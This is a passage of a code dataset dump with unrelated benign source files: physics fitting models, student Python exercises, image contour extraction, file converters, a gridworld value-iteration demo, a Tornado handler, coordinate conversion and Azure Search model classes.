get_func(obs, name):\n if name == \"bw\":\n return zphysics.pdf.RelativisticBreitWigner(obs=obs, m=ZMASS, gamma=ZWIDTH)\n\ndef get_resolution(name, category=\"\"):\n if name == \"gauss\":\n return zfit.pdf.Gauss(\n obs=zfit.Space('x', (-10., 10.)), \n mu=zfit.Parameter('sig_mu_{0}'.format(category), 0, -2.5, 2.5), \n sigma=zfit.Parameter('sig_sigma_{0}'.format(category), 2, 0.1, 5))\n elif name == \"cb\":\n return zfit.pdf.CrystalBall(\n obs=zfit.Space('x', (-10., 10.)), \n mu=zfit.Parameter('sig_mu_{0}'.format(category), 0, -2.5, 2.5), \n sigma=zfit.Parameter('sig_sigma_{0}'.format(category), 2, 0.1, 5),\n alpha=zfit.Parameter('sig_alpha_{0}'.format(category), 5, 0, 20),\n n=zfit.Parameter('sig_n_{0}'.format(category), 5,0.5,10),\n ) \n\n\ndef get_signal(obs, func=\"bw\", resolution=\"gauss\", category=\"\"):\n \n func = get_func(obs, func)\n\n if resolution == None:\n return func\n \n return zfit.pdf.FFTConvPDFV1(func, get_resolution(resolution, category), obs=obs, interpolation=\"spline:3\")\n\n# background models -----------------------------------------\n\ndef get_background(obs, func=\"exp\", category=\"\"):\n\n if func == \"uniform\":\n return zfit.pdf.Uniform(obs=obs)\n elif func == \"exp\":\n return zfit.pdf.Exponential(zfit.Parameter('bkg_lambda_{0}'.format(category), -0.01, -0.5, 1.0), obs=obs)\n elif func == \"chebyshev\":\n return zfit.pdf.Chebyshev(coeffs=[zfit.Parameter('bkg_{0}_{1}'.format(i, category), 0.0, -1.0, 1.0) for i in range(3)], obs=obs)\n","sub_path":"ZHarvester/zfit/zfit_models.py","file_name":"zfit_models.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 
+{"seq_id":"395883813","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# <nav class=\"navbar navbar-default\">\n# <div class=\"container-fluid\">\n# <div class=\"navbar-header\">\n# <a class=\"navbar-brand\" href=\"_Oving2.ipynb\">Assignment 2</a>\n# </div>\n# </div>\n# </nav>\n# \n# # Seasons\n# \n# **Learning goals**\n# - Conditions\n# - Logical expressions\n# \n# **Starting Out with Python:**\n# - Kap. 3.3-3.5\n# \n# In this assignment, a user must enter the day and month and find out what season the date belongs to.\n# \n# One year has (officially) four seasons, and in this assignment we assume that the season changes follow the table below. \n# **(Note the dates) **\n# \n# \n# Season | First day\n# --- | ---\n# Spring | 20. mar\n# Summer | 21. jun\n# Autumn | 22. sep\n# Winter | 21. dec\n\n# **Task:** Create a program that takes in a month as a string and a day in that month as a number from the user. The program will then print out the season associated with this date.\n# \n# You can assume that the input is a valid date.\n# \n# **Example run:**\n# ```\n# Month: mar\n# Day: 20\n# Spring\n# ``` \n# \n# ```\n# Month: mar\n# Day: 19\n# Winter\n# ``` \n# \n# ```\n# Month: nov\n# Day: 20\n# Autumn\n# ```\n# \n# ___Write your code here:___\n\n# In[ ]:\n\n\nmon = input('Month: ')\nday = int(input('Day: '))\nif mon == 'mar' :\n if day >= 20 : \n print('Spring')\n else:\n print('Winter')\nelif mon in ['apr', 'may']:\n print('Spring')\nelif mon == 'jun':\n if day < 21:\n print('Spring')\n else: \n print('Summer')\n \nelif mon in ['jul', 'aug']:\n print('Summer')\nelif mon == 'sep':\n if day < 22:\n print('Summer')\n elif day >= 22: \n print('Autumn')\n \nelif mon in ['oct', 'nov']: \n print('Autumn')\nelif mon == 'dec':\n if day < 21:\n print('Autumn')\n else:\n print('Winter')\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"tdt4127/Aarstider(ENG).py","file_name":"Aarstider(ENG).py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"228480977","text":"#coding=utf-8\nimport cv2\nimport numpy as np\nimport glob\nimport sys\nimport os\n\ndef findMarginalPoint(contour):\n return (contour[:,:,1]).min(),(contour[:,:,1]).max(),(contour[:,:,0]).min(),(contour[:,:,0]).max()\n\ndef getCancerPartsFromImage(srcPath,labelPath):\n src = cv2.imread(srcPath,0)\n label = cv2.imread(labelPath,0)\n if(src is None or label is None):\n print(\"Not enough src image or not enough label image!\")\n exit(1)\n if(np.shape(src) != np.shape(label)):\n print(\"assert \\\"src.width == label.width && src.height == label.height \\\" failed!\")\n exit(-1)\n\n (_, contours, _)=cv2.findContours(label,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n outputImages = []\n for contour in contours:\n left,right,top,bottom = findMarginalPoint(contour)\n if((left < 0 or top < 0) and (right >np.shape(src)[0] or bottom > np.shape(src)[1]) ):\n continue\n if(left == right or top == bottom):\n continue\n tempSrc = src.copy()\n tempImage = np.zeros(np.shape(src))\n cv2.drawContours(tempImage,[contour],0,255,-1)\n for i in range(len(tempImage)):\n for j in range(len(tempImage[i])):\n if(tempImage[i][j] == 0):\n tempSrc[i][j] = 0\n outputImages.append(tempSrc[left:right,top:bottom])\n cv2.imshow(\"contourImage\",tempSrc[left:right,top:bottom])\n cv2.waitKey(1)\n return outputImages\n\ndef getCancerPartsFromBatchImages(folderPath,outputPath=\"\",writeToFile = True):\n imgPathes = glob.glob(folderPath+\"//img//*\")\n labelPathes = 
glob.glob(folderPath+\"//label//*\")\n if(len(imgPathes)==0 or len(labelPathes)==0):\n print(r\"The folder structure should like this: floderPath\\\\img\\\\*.tif floderpath\\\\label\\\\*.tif\")\n return\n allCancerParts = []\n total = len(imgPathes)\n index = 1\n for imagePath,labelPath in zip(imgPathes,labelPathes):\n print(\"Dealing with the %dth/%d image...\"%(index,total))\n index += 1\n allCancerParts.extend(getCancerPartsFromImage(imagePath,labelPath))\n if writeToFile:\n for index,img in enumerate(allCancerParts):\n cv2.imwrite(outputPath+\"//\"+str(index)+\".tif\",img)\n return allCancerParts\ndef main():\n argv = sys.argv\n if (len(argv) < 3):\n print(\"usage: python ExtractCancerCell.py folderPath outputPath writeToFile,\")\n print(r\"The folder structure should like this: floderPath\\\\img\\\\*.tif floderpath\\\\label\\\\*.tif\")\n exit(1)\n folderPath = argv[1]\n outputPath = argv[2]\n if not os.path.exists(outputPath):\n os.makedirs(outputPath)\n getCancerPartsFromBatchImages(folderPath, outputPath, writeToFile=True)\n\nif __name__ == \"__main__\":\n main()\n exit(0)","sub_path":"sample/extract_cancer_cell.py","file_name":"extract_cancer_cell.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"246332721","text":"#!/usr/bin/env python3\n\n\"\"\"Shimadzu SPC file bulk converter.\n\nFinds all spc file in the given directory and converts them to CSV.\nSee https://github.com/uri-t/shimadzu-spc-converter for more details\n\nUsage:\n spc_bulk_convert.py <directory>\n spc_bulk_convert.py -h | --help\n\nOptions:\n -h --help Show this screen.\n\"\"\"\nfrom docopt import docopt\nfrom pathlib import Path\nfrom getSpectrum import main\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='Naval Fate 2.0')\n \n directory = arguments['<directory>']\n # recursively iterate all items matching the glob pattern\n for spc_file in Path(directory).rglob('*'):\n # .suffix property refers to .ext extension\n ext = spc_file.suffix\n # use the .lower() method to get lowercase version of extension\n if ext.lower() == \".spc\":\n spc_file = str(spc_file)\n\n with open(spc_file, 'rb') as f:\n signature = f.read(4)\n\n if signature == b'\\xD0\\xCF\\x11\\xE0':\n main(spc_file)\n print('converted ' + spc_file)\n else:\n print('Not OLE CF type file format, skipping: ' + spc_file)\n\n","sub_path":"spc_bulk_convert.py","file_name":"spc_bulk_convert.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"133422259","text":"import os\nimport glob\nimport csv\nfrom xlsxwriter.workbook import Workbook\n\nfilepath = r\"O:/Medical Informatics-General/2018 iPatientCare Data Extracts/2018_07_02 - Copy/\"\nfilepathsave = r\"O:\\\\Medical Informatics-General\\\\2018 iPatientCare Data Extracts\\\\Test\\\\\"\nconvertfolder = r\"2018_07_02 - Copy\\\\\"\n\nfor csvfile in glob.glob(os.path.join(filepath, '*.csv')):\n print(csvfile)\n workbook = Workbook(csvfile[:-4] + '.xlsx')\n worksheet = workbook.add_worksheet()\n with open(csvfile, 'rt') as f:\n reader = csv.reader(f)\n for r, row in enumerate(reader):\n for c, col in enumerate(row):\n worksheet.write(r, c, col)\n workbook.close()","sub_path":"General Python Codes/convert_csv.py","file_name":"convert_csv.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 
+{"seq_id":"136892071","text":"# Author : Iman Kianian\n# 1 January 2021\nfrom State import State\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nclass gameboard(object):\n def setupUi(self, window,epsilon,gamma,livingreward,firereward,diamondreward):\n window.setObjectName(\"Form\")\n self.Form=window\n Form = QtWidgets.QWidget(window)\n Form.setFixedHeight(5*100)\n Form.setFixedWidth(5*100)\n Form.setObjectName(\"centralwidget\")\n Form.setStyleSheet(\"border:1px dashed black;\")\n self.gridLayout_2 = QtWidgets.QGridLayout(Form)\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.maketable(epsilon,gamma,livingreward,firereward,diamondreward)\n window.setCentralWidget(Form)\n self.retranslateUi(window)\n QtCore.QMetaObject.connectSlotsByName(window)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Grid World Game - Game Board\"))\n\n def maketable(self,epsilon,discount,livingreward,firereward,diamondreward):\n actions=['Right','Left','Up','Down']\n v=[]\n v_=[[],[],[]]\n def predictnext(rowindex,columnindex,direction): # predict next state after doing a work ( Successor Function )\n if direction=='Right' and (columnindex==3 or (rowindex==1 and columnindex==0)) :\n return (rowindex,columnindex)\n elif direction=='Left' and (columnindex==0 or (rowindex==1 and columnindex==2)):\n return (rowindex,columnindex)\n elif direction=='Up' and (rowindex==0 or (rowindex==2 and columnindex==1)):\n return (rowindex,columnindex)\n elif direction=='Down' and (rowindex==2 or (rowindex==0 and columnindex==1)):\n return (rowindex,columnindex)\n elif direction=='Right':\n return (rowindex,columnindex+1)\n elif direction=='Left':\n return (rowindex,columnindex-1)\n elif direction=='Up':\n return (rowindex-1,columnindex)\n elif direction=='Down':\n return (rowindex+1,columnindex)\n\n def calculatemax(state,v): # find Optimal Action From a state\n P=[0.8,0.1,0.1]\n actionsu=[0 for i in actions]\n for i in range(len(actions)):\n if actions[i]=='Right' or actions[i]=='Left':\n actionscan=[actions[i],'Down','Up']\n elif actions[i]=='Up' or actions[i]=='Down':\n actionscan=[actions[i],'Right','Left']\n for j in range(len(actionscan)):\n nextstate=predictnext(state.rowindex,state.columnindex,actionscan[j])\n if nextstate[0]==0 and nextstate[1]==3:\n actionsu[i]+=P[j]*(diamondreward+(discount*v[nextstate[0]][nextstate[1]]))\n elif nextstate[0]==1 and nextstate[1]==3:\n actionsu[i]+=P[j]*(firereward+(discount*v[nextstate[0]][nextstate[1]]))\n else:\n actionsu[i]+=P[j]*(livingreward+(discount*v[nextstate[0]][nextstate[1]]))\n maxindex=0\n maxvalue=actionsu[0]\n for j in range(1,len(actions)):\n if actionsu[j]>maxvalue:\n maxvalue=actionsu[j]\n maxindex=j\n return (maxvalue,actions[maxindex])\n\n # Initialize Variables -- Start\n\n for i in range(3): ## making states\n for j in range(4):\n if i==0 and j==3:\n v_[i].append(State(i,j,diamondreward,'Diamond'))\n elif i==1 and j==1:\n v_[i].append(State(i,j,livingreward,'Block'))\n elif i==1 and j==3:\n v_[i].append(State(i,j,firereward,'Fire'))\n else:\n v_[i].append(State(i,j,livingreward))\n v=[[i.V for i in v_[0]],[i.V for i in v_[1]],[i.V for i in v_[2]]]\n\n Policy=[['none' for i in range(4)] for i in range(3)] # For Save Action Policy for each state.\n iterations=0 # Counting iteration of while loop\n\n # Initialize Variables -- End\n\n # Value Iteration -- Start\n while True:\n iterations+=1\n delta=0\n v=[[i.V for i in v_[0]],[i.V for i in v_[1]],[i.V for i in v_[2]]]\n for i in 
range(3):\n for j in range(4):\n if not ((i==0 and j==3) or (i==1 and j==3) or (i==1 and j==1)): \n temp=calculatemax(v_[i][j],v)\n v_[i][j].V=temp[0]\n Policy[i][j]=temp[1]\n if abs(v_[i][j].V -v[i][j])>delta:\n delta = abs(v_[i][j].V-v[i][j])\n if delta < (epsilon*(1-discount))/discount:\n break\n # Value Iteration -- End\n\n # Create graphical table -- Start\n for i in range(3): \n for j in range(4):\n label = QtWidgets.QLabel(self.Form)\n label.setFixedWidth(100)\n label.setFixedHeight(100)\n if Policy[i][j]!='none':\n label.setPixmap(QtGui.QPixmap(f\"img/{Policy[i][j]}.png\"))\n elif v_[i][j].role in (('Diamond', 'Fire')):\n label.setPixmap(QtGui.QPixmap(f\"img/{v_[i][j].role}.png\"))\n else:\n label.setStyleSheet('background-color:black;')\n self.gridLayout_2.addWidget(label, i, j, 1, 1)\n\n label = QtWidgets.QLabel(self.Form)\n label.setFixedHeight(50)\n label.setText(f'This is The Result After {iterations} iterations . ')\n label.setStyleSheet('font-size:20px;')\n self.gridLayout_2.addWidget(label, 3, 0, 1, 4)\n # Create graphical table -- End\n\n print(Policy,iterations)\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QMainWindow()\n ui = gameboard()\n epsilon=0.00001\n discount=0.99\n livingreward=-1\n firereward=-1\n diamondreward=1\n ui.setupUi(Form,epsilon,discount,livingreward,firereward,diamondreward)\n Form.show()\n sys.exit(app.exec_())\n\n","sub_path":"GUI_Version/gameboard.py","file_name":"gameboard.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"369717377","text":"'''\n11. タブをスペースに置換\nタブ1文字につきスペース1文字に置換せよ.確認にはsedコマンド,trコマンド,もしくはexpandコマンドを用いよ.\n'''\nimport sys\n\n# 読み込み\nwith open(sys.argv[1], \"r\") as f:\n for line in f:\n print(line.rstrip().replace(\"\\t\", \" \"))\n\n# sed -e 's/ //g' hightemp.txt\n# https://rcmdnk.com/blog/2016/09/13/computer-gnu-bsd-linux-mac/\n\n# tr '\\t' ' ' < hightemp.txt\n\n# expand -t 1 hightemp.txt\n# https://webkaru.net/linux/expand-command/","sub_path":"yoshimura/chapter02/knock11.py","file_name":"knock11.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"149561086","text":"\n\nfrom xai.brain.wordbase.verbs._glean import _GLEAN\n\n#calss header\nclass _GLEANS(_GLEAN, ):\n\tdef __init__(self,): \n\t\t_GLEAN.__init__(self)\n\t\tself.name = \"GLEANS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"glean\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_gleans.py","file_name":"_gleans.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589135834","text":"import tornado.ioloop\nimport tornado.web\nimport os\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"static/E5.html\")\n\nclass MainHandler_post(tornado.web.RequestHandler):\n def post(self):\n num1=self.get_argument('num1')\n num2=self.get_argument('num2')\n if int(num2)<int(num1):\n print(num1)\n self.write(num1)\n else:\n print(num2)\n self.write(num2)\n\ndef make_app():\n settings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n}\n return tornado.web.Application([\n (r\"/\", MainHandler),\n (r'/post_test/', MainHandler_post),\n], **settings)\n\nif __name__ == \"__main__\":\n app = make_app()\n app.listen(8888)\n 
tornado.ioloop.IOLoop.current().start()\n","sub_path":"kadai/E5.py","file_name":"E5.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"357951083","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport csv\nimport sys\nimport math\nimport argparse\nfrom transform_coord.coordTransform_utils import gcj02_to_bd09\nfrom transform_coord.coordTransform_utils import bd09_to_gcj02\nfrom transform_coord.coordTransform_utils import wgs84_to_gcj02\nfrom transform_coord.coordTransform_utils import gcj02_to_wgs84\nfrom transform_coord.coordTransform_utils import bd09_to_wgs84\nfrom transform_coord.coordTransform_utils import wgs84_to_bd09\n\n# Configuration\n# Input file name\nINPUT = ''\n# Output file name\nOUTPUT = ''\n# Convert type: g2b, b2g, w2g, g2w, b2w, w2b\nTYPE = ''\n# lng column name\nLNG_COLUMN = ''\n# lat column name\nLAT_COLUMN = ''\n# Skip invalid row\nSKIP_INVALID_ROW = False\n\n\ndef convert():\n with open(INPUT, 'r') as input_file:\n input_file_reader = csv.reader(input_file)\n headers = next(input_file_reader)\n lng_index, lat_index = get_lng_lat_index(headers)\n results = []\n\n for index, row in enumerate(input_file_reader):\n result = []\n try:\n result = convert_by_type(float(row[lng_index]), float(row[lat_index]), TYPE)\n except ValueError:\n # Deal with ValueError(invalid lng or lat)\n # print(index + 2, row[lng_index], row[lat_index]) # '+ 2' is due to zero-based index and first row is header\n result = row[lng_index], row[lat_index]\n results.append(result)\n\n with open(OUTPUT, 'w') as output_file:\n output_file_writer = csv.writer(output_file)\n\n with open(INPUT, 'r') as input_file:\n input_file_reader = csv.reader(input_file)\n headers = next(input_file_reader)\n lng_index, lat_index = get_lng_lat_index(headers)\n\n output_file_writer.writerow(headers)\n for index, row in enumerate(input_file_reader):\n row[lng_index] = results[index][0]\n row[lat_index] = results[index][1]\n if type(row[lng_index]) is not float or type(row[lat_index]) is not float:\n # Data is invalid\n if SKIP_INVALID_ROW:\n # Skip invalid row\n pass\n else:\n # Reserve invalid row\n output_file_writer.writerow(row)\n else:\n # Data is valid\n output_file_writer.writerow(row)\n\n\ndef get_lng_lat_index(headers):\n try:\n if LNG_COLUMN == '' and LAT_COLUMN == '':\n return [headers.index('lng'), headers.index('lat')]\n else:\n return [headers.index(LNG_COLUMN), headers.index(LAT_COLUMN)]\n except ValueError as error:\n print('Error: ' + str(error).split('is', 1)[0] + 'is missing from csv header. 
Or use -n or -a to specify custom column name for lng or lat.')\n sys.exit()\n\n\ndef convert_by_type(lng, lat, type):\n if type == 'g2b':\n return gcj02_to_bd09(lng, lat)\n elif type == 'b2g':\n return bd09_to_gcj02(lng, lat)\n elif type == 'w2g':\n return wgs84_to_gcj02(lng, lat)\n elif type == 'g2w':\n return gcj02_to_wgs84(lng, lat)\n elif type == 'b2w':\n return bd09_to_wgs84(lng, lat)\n elif type == 'w2b':\n return wgs84_to_bd09(lng, lat)\n else:\n print('Usage: type must be in one of g2b, b2g, w2g, g2w, b2w, w2b')\n sys.exit()\n\n\n# new york standard zone is 18\ndef utm_to_latlng(zone, easting, northing, northernHemisphere=True):\n\n if not northernHemisphere:\n northing = 10000000 - northing\n\n a = 6378137\n e = 0.081819191\n e1sq = 0.006739497\n k0 = 0.9996\n\n arc = northing / k0\n mu = arc / (a * (1 - math.pow(e, 2) / 4.0 - 3 * math.pow(e, 4) / 64.0 - 5 * math.pow(e, 6) / 256.0))\n\n ei = (1 - math.pow((1 - e * e), (1 / 2.0))) / (1 + math.pow((1 - e * e), (1 / 2.0)))\n\n ca = 3 * ei / 2 - 27 * math.pow(ei, 3) / 32.0\n\n cb = 21 * math.pow(ei, 2) / 16 - 55 * math.pow(ei, 4) / 32\n cc = 151 * math.pow(ei, 3) / 96\n cd = 1097 * math.pow(ei, 4) / 512\n phi1 = mu + ca * math.sin(2 * mu) + cb * math.sin(4 * mu) + cc * math.sin(6 * mu) + cd * math.sin(8 * mu)\n\n n0 = a / math.pow((1 - math.pow((e * math.sin(phi1)), 2)), (1 / 2.0))\n\n r0 = a * (1 - e * e) / math.pow((1 - math.pow((e * math.sin(phi1)), 2)), (3 / 2.0))\n fact1 = n0 * math.tan(phi1) / r0\n\n _a1 = 500000 - easting\n dd0 = _a1 / (n0 * k0)\n fact2 = dd0 * dd0 / 2\n\n t0 = math.pow(math.tan(phi1), 2)\n Q0 = e1sq * math.pow(math.cos(phi1), 2)\n fact3 = (5 + 3 * t0 + 10 * Q0 - 4 * Q0 * Q0 - 9 * e1sq) * math.pow(dd0, 4) / 24\n\n fact4 = (61 + 90 * t0 + 298 * Q0 + 45 * t0 * t0 - 252 * e1sq - 3 * Q0 * Q0) * math.pow(dd0, 6) / 720\n\n lof1 = _a1 / (n0 * k0)\n lof2 = (1 + 2 * t0 + Q0) * math.pow(dd0, 3) / 6.0\n lof3 = (5 - 2 * Q0 + 28 * t0 - 3 * math.pow(Q0, 2) + 8 * e1sq + 24 * math.pow(t0, 2)) * math.pow(dd0, 5) / 120\n _a2 = (lof1 - lof2 + lof3) / math.cos(phi1)\n _a3 = _a2 * 180 / math.pi\n\n latitude = 180 * (phi1 - fact1 * (fact2 + fact3 + fact4)) / math.pi\n\n if not northernHemisphere:\n latitude = -latitude\n\n longitude = ((zone > 0) and (6 * zone - 183.0) or 3.0) - _a3\n\n return (latitude, longitude)\n\n\nif __name__ == '__main__':\n\n # print(gcj02_to_wgs84(116.4172, 39.93889))\n\n print(wgs84_to_gcj02(4326, 39.93889))\n\n print(utm_to_latlng(18, 538090.21382165, 4436628.55154459))\n\n # parser = argparse.ArgumentParser(description='Convert coordinates in csv files.', usage='%(prog)s [-h] -i INPUT -o OUTPUT -t TYPE [-n LNG_COLUMN] [-a LAT_COLUMN] [-s SKIP_INVALID_ROW]', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n #\n # group = parser.add_argument_group('arguments')\n #\n # group.add_argument('-i', '--input', help='Location of input file', default=argparse.SUPPRESS, metavar='')\n # group.add_argument('-o', '--output', help='Location of output file', default=argparse.SUPPRESS, metavar='')\n # group.add_argument('-t', '--type', help='Convert type, must be one of: g2b, b2g, w2g, g2w, b2w, w2b', default=argparse.SUPPRESS, metavar='')\n # group.add_argument('-n', '--lng_column', help='Column name for longitude', default='lng', metavar='')\n # group.add_argument('-a', '--lat_column', help='Column name for latitude', default='lat', metavar='')\n # group.add_argument('-s', '--skip_invalid_row', help='Whether to skip invalid row', default=False, type=bool, metavar='')\n #\n # args = parser.parse_args()\n # # 
print('\\nArguments you provide are:')\n # # for arg in vars(args):\n # # print '{0:20} {1}'.format(arg, str(getattr(args, arg)))\n #\n # # Get arguments\n # if not args.input or not args.output or not args.type:\n # parser.print_help()\n # else:\n # INPUT = args.input\n # OUTPUT = args.output\n # TYPE = args.type\n #\n # if args.lng_column and args.lat_column:\n # LNG_COLUMN, LAT_COLUMN = args.lng_column, args.lat_column\n #\n # if args.skip_invalid_row:\n # SKIP_INVALID_ROW = args.skip_invalid_row\n #\n # convert()\n","sub_path":"transform_coord/coord_converter.py","file_name":"coord_converter.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"80142215","text":"import constants\nimport os\nimport shared\n\ndef enforce_types(*types, return_type=None):\n def decorator(f):\n def new_f(*args, **kwds):\n #we need to convert args into something mutable \n for (a, t) in zip(args, types):\n if not isinstance(a,t):\n raise TypeError(\" [Enforced Types]: Arguments of wrong type passed to function\")\n #feel free to have more elaborated convertion\n result = f(*args, **kwds)\n if return_type:\n if not isinstance(result,return_type):\n raise TypeError(f\" [Enforced Types]: Function returned wrong type \\n Expected {repr(return_type)}. Received {type(result)} \")\n \n return result\n return new_f\n return decorator\n\ndef strip_useless_characters(word):\n for ch in constants.useless_character_list:\n word = word.strip(ch)\n\n return word \n\ndef check_special_characters(word):\n for ch in constants.special_characters:\n if ch in word:\n raise ValueError(f\"The words must not contain these characters: {constants.special_characters}. The word here is {word}\") \n\ndef ret_document_dir_path():\n cur_dirpath = os.getcwd()\n directory = os.path.join(cur_dirpath, constants.documents_directory_name)\n\n return directory\n\ndef map_document_ids():\n\n directory = ret_document_dir_path()\n \n document_id_map = dict()\n\n idx = 1\n\n for filename in os.listdir(directory):\n if filename.endswith(\".txt\"): \n document_id_map[idx] = filename\n idx+=1\n else:\n continue\n\n return document_id_map\n\ndef pretty_print_dict(dict_instance):\n for key in dict_instance:\n print(key, \" : \", dict_instance[key])\n\n\ndef print_base_index():\n pretty_print_dict(shared.BASE_INDEX)\n\ndef pretty_print_doc_result(doc_list):\n if not doc_list:\n print(\"No documents matched the given query\")\n return \n for doc in doc_list:\n print(doc, shared.DOCUMENT_ID_MAP[doc])\n\ndef print_btree_layer(layer):\n print(\"Btree layer:\")\n for node in layer:\n print(str(node), end=\" :\")\n for pair in node.data_pointer_pairs:\n print(f\"({pair.data},{str(repr(pair.pointer))})\", end=\" \")\n print()\n\nif __name__ == \"__main__\":\n print(ret_document_dir_path())\n print(map_document_ids()) ","sub_path":"College Study/sem5/Information Retrival/Assignments/Assign-1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"618612419","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\nimport msrest.serialization\nfrom ._generated.models import LexicalAnalyzer, LexicalTokenizer\n\n\nclass PatternAnalyzer(LexicalAnalyzer):\n \"\"\"Flexibly separates text into terms via a regular expression.\n This analyzer is implemented using Apache Lucene.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the analyzer. It must only contain letters, digits, spaces,\n dashes or underscores, can only start and end with alphanumeric characters, and is limited to\n 128 characters.\n :type name: str\n :param lower_case_terms: A value indicating whether terms should be lower-cased. Default is\n true.\n :type lower_case_terms: bool\n :param pattern: A regular expression to match token separators. Default is an\n expression that matches one or more white space characters.\n :type pattern: str\n :param flags: List of regular expression flags. Possible values of each flag include: 'CANON_EQ',\n 'CASE_INSENSITIVE', 'COMMENTS', 'DOTALL', 'LITERAL', 'MULTILINE', 'UNICODE_CASE', 'UNIX_LINES'.\n :type flags: list[str] or list[~search_service_client.models.RegexFlags]\n :param stopwords: A list of stopwords.\n :type stopwords: list[str]\n \"\"\"\n\n _validation = {\"odata_type\": {\"required\": True}, \"name\": {\"required\": True}}\n\n _attribute_map = {\n \"odata_type\": {\"key\": \"@odata\\\\.type\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"lower_case_terms\": {\"key\": \"lowercase\", \"type\": \"bool\"},\n \"pattern\": {\"key\": \"pattern\", \"type\": \"str\"},\n \"flags\": {\"key\": \"flags\", \"type\": \"[str]\"},\n \"stopwords\": {\"key\": \"stopwords\", \"type\": \"[str]\"},\n }\n\n def __init__(self, **kwargs):\n super(PatternAnalyzer, self).__init__(**kwargs)\n self.odata_type = \"#Microsoft.Azure.Search.PatternAnalyzer\"\n self.lower_case_terms = kwargs.get(\"lower_case_terms\", True)\n self.pattern = kwargs.get(\"pattern\", r\"\\W+\")\n self.flags = kwargs.get(\"flags\", None)\n self.stopwords = kwargs.get(\"stopwords\", None)\n\n\nclass PatternTokenizer(LexicalTokenizer):\n \"\"\"Tokenizer that uses regex pattern matching to construct distinct tokens.\n This tokenizer is implemented using Apache Lucene.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the tokenizer. It must only contain letters, digits, spaces,\n dashes or underscores, can only start and end with alphanumeric characters, and is limited to\n 128 characters.\n :type name: str\n :param pattern: A regular expression to match token separators. Default is an\n expression that matches one or more white space characters.\n :type pattern: str\n :param flags: List of regular expression flags. Possible values of each flag include: 'CANON_EQ',\n 'CASE_INSENSITIVE', 'COMMENTS', 'DOTALL', 'LITERAL', 'MULTILINE', 'UNICODE_CASE', 'UNIX_LINES'.\n :type flags: list[str] or list[~search_service_client.models.RegexFlags]\n :param group: The zero-based ordinal of the matching group in the regular expression to\n extract into tokens. Use -1 if you want to use the entire pattern to split the input into\n tokens, irrespective of matching groups. 
Default is -1.\n :type group: int\n \"\"\"\n\n _validation = {\"odata_type\": {\"required\": True}, \"name\": {\"required\": True}}\n\n _attribute_map = {\n \"odata_type\": {\"key\": \"@odata\\\\.type\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"pattern\": {\"key\": \"pattern\", \"type\": \"str\"},\n \"flags\": {\"key\": \"flags\", \"type\": \"[str]\"},\n \"group\": {\"key\": \"group\", \"type\": \"int\"},\n }\n\n def __init__(self, **kwargs):\n super(PatternTokenizer, self).__init__(**kwargs)\n self.odata_type = \"#Microsoft.Azure.Search.PatternTokenizer\"\n self.pattern = kwargs.get(\"pattern\", r\"\\W+\")\n self.flags = kwargs.get(\"flags\", None)\n self.group = kwargs.get(\"group\", -1)\n\n\nclass SearchResourceEncryptionKey(msrest.serialization.Model):\n \"\"\"A customer-managed encryption key in Azure Key Vault. Keys that you create and manage can be\n used to encrypt or decrypt data-at-rest in Azure Cognitive Search, such as indexes and synonym maps.\n\n All required parameters must be populated in order to send to Azure.\n\n :param key_name: Required. The name of your Azure Key Vault key to be used to encrypt your data\n at rest.\n :type key_name: str\n :param key_version: Required. The version of your Azure Key Vault key to be used to encrypt\n your data at rest.\n :type key_version: str\n :param vault_uri: Required. The URI of your Azure Key Vault, also referred to as DNS name, that\n contains the key to be used to encrypt your data at rest. An example URI might be https://my-\n keyvault-name.vault.azure.net.\n :type vault_uri: str\n :param application_id: Required. An AAD Application ID that was granted the required access\n 